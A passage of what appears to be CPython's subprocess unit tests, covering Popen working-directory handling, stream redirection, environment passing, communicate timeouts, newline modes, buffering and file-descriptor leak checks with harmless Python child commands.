self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
'__PYVENV_LAUNCHER__' in n or # MacOS framework build
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
